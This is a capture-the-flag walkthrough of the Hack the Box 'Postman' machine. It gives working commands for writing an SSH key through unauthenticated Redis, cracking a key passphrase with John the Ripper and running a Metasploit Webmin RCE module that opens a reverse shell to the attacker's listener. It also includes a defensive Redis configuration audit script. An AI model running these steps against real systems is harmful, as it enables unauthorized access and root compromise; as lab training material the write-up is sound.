Hack the box: Postman

Postman was an easy difficulty machine on Hack the box. Here’s my take on solving the machine.

Tl;dr: An unauthenticated, publicly reachable Redis instance allows overwriting authorized_keys and thus SSH access. Over SSH it is possible to retrieve a second, encrypted key whose passphrase, once cracked, turns out to be user Matt’s password. Matt’s credentials give access to a vulnerable Webmin instance that can be exploited for a privileged reverse shell.

Recon

An Nmap scan reveals a couple of services. The most unusual one is the Redis store.

nmap postman.htb -sS -sV -n -p-
--snip--
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Low privilege shell

There is a dedicated command-line client for Redis. It can be installed with:

# apt-get install redis-tools

After that it is possible to connect to the service without authentication and read its configuration:

redis-cli -h postman.htb
postman.htb:6379> CONFIG GET dir
1) "dir"
2) "/var/lib/redis"

Assuming that /var/lib/redis is the redis user’s home folder, it should be possible to add an authorized SSH key. First, Redis has to be configured so that its next dump overwrites authorized_keys:

postman.htb:6379> config set dir /var/lib/redis/.ssh
OK
postman.htb:6379> config set dbfilename authorized_keys
OK

Then store the public key, padded with newlines so it ends up on its own line inside the dump, as a value in the database:

# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") | redis-cli -h postman.htb -x set ssh_key

Finally, save the changes:

# redis-cli -h postman.htb
postman.htb:6379> save
OK

Now it is possible to log in over SSH as redis:

# ssh redis@postman.htb -i id_rsa -c aes256-ctr
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
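As an added defensive check, not part of the original writeup: a small Python audit that flags the redis.conf settings which together make the dir/dbfilename trick above possible, and a scan that spots an authorized_keys file polluted by an RDB dump. The config snippets and the sample authorized_keys bytes are constructed, and the key-line check does not parse option prefixes.

```python
import re

# Constructed sample configs (not from the box). WEAK_CONF mirrors the state abused
# above: reachable from the network, no password, CONFIG available.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
"""
HARDENED_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
"""
# Constructed approximation of authorized_keys after a Redis SAVE: RDB magic and
# binary framing around the key that was padded with blank lines.
POLLUTED_KEYS = (b"REDIS0008\xfa\tredis-ver\x054.0.9\xfe\x00\x00\x07ssh_key\n\n"
                 b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7 constructed@example\n\n"
                 b"\xff\x12\x34\x56\x78\x9a\xbc\xde\n")
KEY_LINE = re.compile(r"^(ssh-(rsa|ed25519|dss)|ecdsa-sha2-nistp\d+) [A-Za-z0-9+/]+=*( \S.*)?$")

def audit_redis_conf(text):
    """List the settings that together allow the dir/dbfilename trick used above."""
    opts = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            opts.setdefault(key.lower(), []).append(value.strip())
    findings = []
    if "requirepass" not in opts:
        findings.append("no requirepass: any client can run CONFIG SET and SAVE")
    if "bind" not in opts or any(a in ("0.0.0.0", "::", "*") for a in opts["bind"][0].split()):
        findings.append("bind exposes Redis on non-loopback interfaces")
    if opts.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("protected-mode no: unauthenticated remote clients are not refused")
    if not any(v.upper().startswith("CONFIG ") for v in opts.get("rename-command", [])):
        findings.append("CONFIG not renamed: dir/dbfilename can be pointed at ~/.ssh")
    return findings

def suspicious_authorized_keys_lines(data):
    """Return raw entries that are neither blank, comments nor plain key lines."""
    bad = []
    for raw in data.split(b"\n"):
        try:
            line = raw.decode("ascii").strip()
        except UnicodeDecodeError:
            line = None  # binary data never belongs in authorized_keys
        if line is None or (line and not line.startswith("#") and not KEY_LINE.match(line)):
            bad.append(repr(raw[:40]))
    return bad
```

Running audit_redis_conf against a live instance's `CONFIG GET` output works the same way once the key/value pairs are joined into lines.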

Password cracking

The .bash_history file hints at an interesting file and a username:

redis@Postman:~$ cat .bash_history 
-- snip --
su Matt
exit
cat id_rsa.bak
-- snip --

The file can be found in the /opt directory:

redis@Postman:~$ find / -name "id_rsa.bak" 2>/dev/null
/opt/id_rsa.bak
redis@Postman:~$ cat /opt/id_rsa.bak 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

The key’s passphrase can be cracked with John the Ripper. First the key is converted into a crackable hash with ssh2john:

# ssh2john.exe D:\key.txt
-- snip --
key.txt:$ssh2$2d2d2d2d2d424547494e205253412050524956415445204b45592d2d2d2d2d0d0a50726f632d547970653a20342c454e435259505445440d0a44454b2d496e666f3a-- snip --

The result is then fed to john for the actual cracking:

# cat key2.txt
key:$sshng$0$8$73E9CEFBCCF5287C$1192$25e840e75235eebb0238e56ac96c7e0bcdfadc8381617435d43770fe9af72f6036343b41eedbec5cdcaa2838217d09d77301892540fd9-- snip --
# john.exe key2.txt --wordlist=rockyou.txt
-- snip --
computer2008     (key)

Root shell

Using the already known user and password (Matt:computer2008) it is possible to log in to the Webmin service. After logging in, it reveals the running version:

Webmin version

There is a public RCE exploit for that version:

# searchsploit "webmin 1.910"

It is available in Metasploit:

# msfconsole -q
msf5 > use exploit/linux/http/webmin_packageup_rce
-- snip --
msf5 exploit(linux/http/webmin_packageup_rce) > info
-- snip --
Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   computer2008     yes       Webmin Password
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     10.10.10.160     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      10000            yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path for Webmin application
  USERNAME   Matt             yes       Webmin Username
  VHOST                       no        HTTP server virtual host

Running the above exploit yields a privileged shell:

msf5 exploit(linux/http/webmin_packageup_rce) > run
[*] Started reverse TCP handler on 10.10.14.70:443 
[+] Session cookie: 1a2775d4c336c5d232853acf8fbd849d
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.70:443 -> 10.10.10.160:38706) at 2019-11-14 17:29:39 +0100
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
a25...
cat /home/Matt/user.txt
517...